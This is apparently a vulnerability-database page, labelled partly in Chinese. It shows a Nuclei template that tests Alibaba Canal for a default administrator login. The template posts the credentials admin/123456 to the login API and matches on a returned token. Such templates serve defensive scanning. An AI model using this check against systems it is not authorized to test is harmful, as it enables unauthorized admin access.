canal-default-login: Alibaba Canal Default Login

日期: 2025-08-01 | 影响软件: Alibaba Canal | POC: 已公开

漏洞描述

An Alibaba Canal default login was discovered.

PoC代码[已公开]

id: canal-default-login

info:
  name: Alibaba Canal Default Login
  author: pdteam
  severity: high
  description: An Alibaba Canal default login was discovered.
  reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: canal,alibaba,default-login,vuln

http:
  - raw:
      - |
        POST /api/v1/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 123456

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'data":{"token"'
          - '"code":20000'
# digest: 4b0a00483046022100fac00e2ece2fa4599c4c8b787230f8b6588c673566a2b01f925fa9e33cdd30ce0221009318ab62fb1557d9f771a534ce6fb3a27558077322fb03aa9f60b07e69dbd1df:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/alibaba/canal-default-login.yaml

相关漏洞推荐